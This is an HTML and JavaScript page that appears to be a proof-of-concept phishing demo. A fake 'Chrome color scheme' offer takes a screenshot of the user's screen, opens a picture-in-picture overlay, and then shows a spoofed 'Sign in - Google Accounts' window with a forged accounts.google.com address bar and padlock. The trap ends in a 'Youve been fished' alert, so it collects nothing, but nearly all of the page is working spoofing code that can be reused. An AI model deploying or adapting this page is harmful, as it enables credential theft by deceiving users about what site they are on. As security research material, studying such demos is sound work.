<html>
<head>
<link href='https://fonts.googleapis.com/css?family=Montserrat' rel='stylesheet'>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<style>
#content {
  position: fixed;
  width:  600px;
  background-color: #eee;
  top: 0;
  left: calc(50% - 300px);
  bottom: 0;
  font-family: 'Montserrat';
  z-index: 0;
}
li {
  list-style-type: none;
}
button {
  height: 60px;
  line-height: 20px;
  background-color: rgb(77 133 238);
  font-size: 18px;
}
#hoverlistener {
  position: fixed;
  width: 400px;
  bottom: 0;
  top: 00px;
  right: 00px;
}
#title-bar {
  height: 31px;
  background-color: #d6dae0;
  width: 100%;
  display: flex;
  justify-content: space-between;
  user-select: none;
}

#logo {
  padding-left: 5px;
  vertical-align: middle;
}

#logo-description {
  color: black;
  font-size: 12px;
  font-family: "system";
  vertical-align: middle;
}

#minimize {
  color: black;
  font-size: 12px;
  padding: 9px 15px 7px 15px;
}

#square {
  color: black;
  font-size: 22px;
  padding: 0px 15px 5px 15px;
}

#exit {
  color: black;
  font-size: 15px;
  padding: 7px 17px 7px 17px;
}

#url-bar {
  height: 28px;
  background-color: #f1f3f4;
  width: 100%;
  display: flex;
  align-items: center;
  white-space: nowrap;
  overflow: scroll;
  text-overflow: ellipsis;
  -ms-overflow-style: none;
  scrollbar-width: none;
  border-bottom: 1px solid lightgray;
}

#url-bar::-webkit-scrollbar {
  display: none;
}

#ssl-padlock {
  user-select: none;
  padding-left: 8px;
  margin-right: 8px;
}

#domain-name {
  color: #000000;
  font-size: 14px;
  font-family: "system";
}

#domain-path {
  color: #7c7c7c;
  font-size: 14px;
  font-family: "system";
}

#title-bar-width {
  width: 100%;
}

#logincontent {
  width: 100%;
  height: 700px;
  background-color: white;
}

#window {
  color: transparent;
  background-color: transparent;
  border-color: transparent;
  box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
  height: 759px; /* title bar height + content height */
  width: 40%;
  display: none;
  z-index: 110;
  position: relative;
}
</style>
</head>
<body style="background-color:rgb(84, 84, 84)">
<div id="window">
<!-- Title bar start -->
<div id="title-bar-width">
  <div id="title-bar">
    <div style="margin-top:5px;">
      <img src="./logo.svg" width="20px" height="15px" id="logo">
      <span id="logo-description">Sign in - Google Accounts</span>
    </div>

    <div>
      <span id="minimize">&#8212;</span>
      <span id="square">□</span>
      <span id="exit">✕</span>
    </div>
  </div>
  <div id="url-bar">
    <img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
    <span id="domain-name">accounts.google.com</span>
    <span id="domain-path">/signin/chrome/sync/identifier?ssp=1&continue=https%3A%2F%2Fwww.google.com%2F&flowName=GlifDesktopChromeSync</span>
  </div>
</div>
<div id="logincontent">
  <center>
  <img src="login_trap.png" />
</center>
</div>
</div>
<center>
  <div id="hoverlistener">

  </div>
  <div id="content">
    <h2>Optomize your Chrome color scheme based on your Windows Color Scheme!</h2>
    <ol>
      <li>Step 1: Take a screenshot using the button below</li>
      <li>Step 2: Sign into Chrome to use Google Cloud Services to generate a color scheme!</li>
    </ol>
    <button id="atk"> Take a screenshot to generate a Sync'ed chrome color profile! </button>
  </div>
</center>
<script>

const takeScreenShot = async () => {
  const stream = await navigator.mediaDevices.getDisplayMedia({
    video: { mediaSource: 'screen' },
  })
  // get correct video track
  const track = stream.getVideoTracks()[0]
  // init Image Capture and not Video stream
  const imageCapture = new ImageCapture(track)
  // take first frame only
  const bitmap = await imageCapture.grabFrame()
  // destory video track to prevent more recording / mem leak
  track.stop()

  const canvas = document.createElement('canvas') 
  // this could be a document.createElement('canvas') if you want
  // draw weird image type to canvas so we can get a useful image
  canvas.width = bitmap.width;
  canvas.height = bitmap.height;
  const context = canvas.getContext('2d');
  context.drawImage(bitmap, 0, 0, bitmap.width, bitmap.height);
  const image = canvas.toDataURL();

  return canvas;
}

document.getElementById("atk").addEventListener("click", e => {
  takeScreenShot().then(sselem => {
    navigator.documentPictureInPicture.requestWindow({
      width: 700,
      initialAspectRatio: 0.35,
    }).then(pip => {
      sselem.style.position = "fixed";
      sselem.style.top = "-31px";
      sselem.style.left = `-${sselem.width - 377}px`;
      pip.window.document.body.appendChild(sselem);

      const fakesync = pip.window.document.createElement('img');
      fakesync.src = "fakesync.png";
      fakesync.style.position = "fixed";
      fakesync.style.top = "34px";
      fakesync.style.left = "46px";
      pip.window.document.body.appendChild(fakesync);

      const logintrap = pip.window.document.createElement('div');
      logintrap.style.position = "fixed";
      logintrap.style.top = "314px";
      logintrap.style.left = "75px";
      logintrap.style.width = "230px";
      logintrap.style.height = "32px";
      pip.window.document.body.appendChild(logintrap);

      pip.window.document.body.addEventListener("click", cl => {
    pip.window.close();
      });

      logintrap.addEventListener("click", cl => {
        fakesync.style.display="none";
        document.getElementById("window").style.display = "block";
        document.getElementById("window").style.zIndex = "100";
      });
    });
  });
  
});

document.getElementById("logincontent").addEventListener('click', _ => {
  alert('Youve been fished :^)');
});

var minimize = document.getElementById("minimize");
var square = document.getElementById("square");
var exit = document.getElementById("exit");
var titleBar = document.getElementById("title-bar");

////////////////// Hover listeners //////////////////
minimize.addEventListener('mouseover', function handleMouseOver() {
  minimize.style.backgroundColor = 'rgba(0, 0, 0, 0.09765625)';
  minimize.style.cursor = 'context-menu';
});

minimize.addEventListener('mouseout', function handleMouseOut() {
  minimize.style.backgroundColor = '#d6dae0';
  minimize.style.cursor = 'default';
});

square.addEventListener('mouseover', function handleMouseOver() {
  square.style.backgroundColor = 'rgba(0, 0, 0, 0.09765625)';
  square.style.cursor = 'context-menu';
});

square.addEventListener('mouseout', function handleMouseOut() {
  square.style.backgroundColor = '#d6dae0';
  square.style.cursor = 'default';
});

exit.addEventListener('mouseover', function handleMouseOver() {
  exit.style.backgroundColor = '#E81123';
  exit.style.cursor = 'context-menu';
});

exit.addEventListener('mouseout', function handleMouseOut() {
  exit.style.backgroundColor = '#d6dae0';
  exit.style.cursor = 'default';
});

titleBar.addEventListener('mouseover', function handleMouseOver() {
  titleBar.style.cursor = 'context-menu';
});

titleBar.addEventListener('mouseout', function handleMouseOver() {
  titleBar.style.cursor = 'default';
});


//////////////// Make window draggable start ////////////////
// Make the DIV element draggable:
var draggable = $('#window');
var title = $('#title-bar');

title.on('mousedown', function(e){
  var dr = $(draggable).addClass("drag");
  height = dr.outerHeight();
  width = dr.outerWidth();
  ypos = dr.offset().top + height - e.pageY,
  xpos = dr.offset().left + width - e.pageX;
  $(document.body).on('mousemove', function(e){
    var itop = e.pageY + ypos - height;
    var ileft = e.pageX + xpos - width;
    if(dr.hasClass("drag")){
      dr.offset({top: itop,left: ileft});
    }
  }).on('mouseup', function(e){
      dr.removeClass("drag");
  });
});
//////////////// Make window draggable end ////////////////


////////////////// Onclick listeners //////////////////
// X button functionality
$("#exit").click(function(){
    $("#window").css("display", "none");
  });

// Maximize button functionality
$("#square").click(enlarge);

function enlarge(){
  if(square.classList.contains("enlarged")){
    $("#window").css("width", "40%");
    $("#title-bar-width").css('width', '100%');
    $("#logincontent").css("width", "100%");
    $("#square").removeClass("enlarged");
  }
  else{
    $("#window").css("width", "70%");
    $("#title-bar-width").css('width', '100%');
    $("#logincontent").css("width", "100%");
    $("#square").addClass("enlarged");
  }
}
</script>
</body>
</html>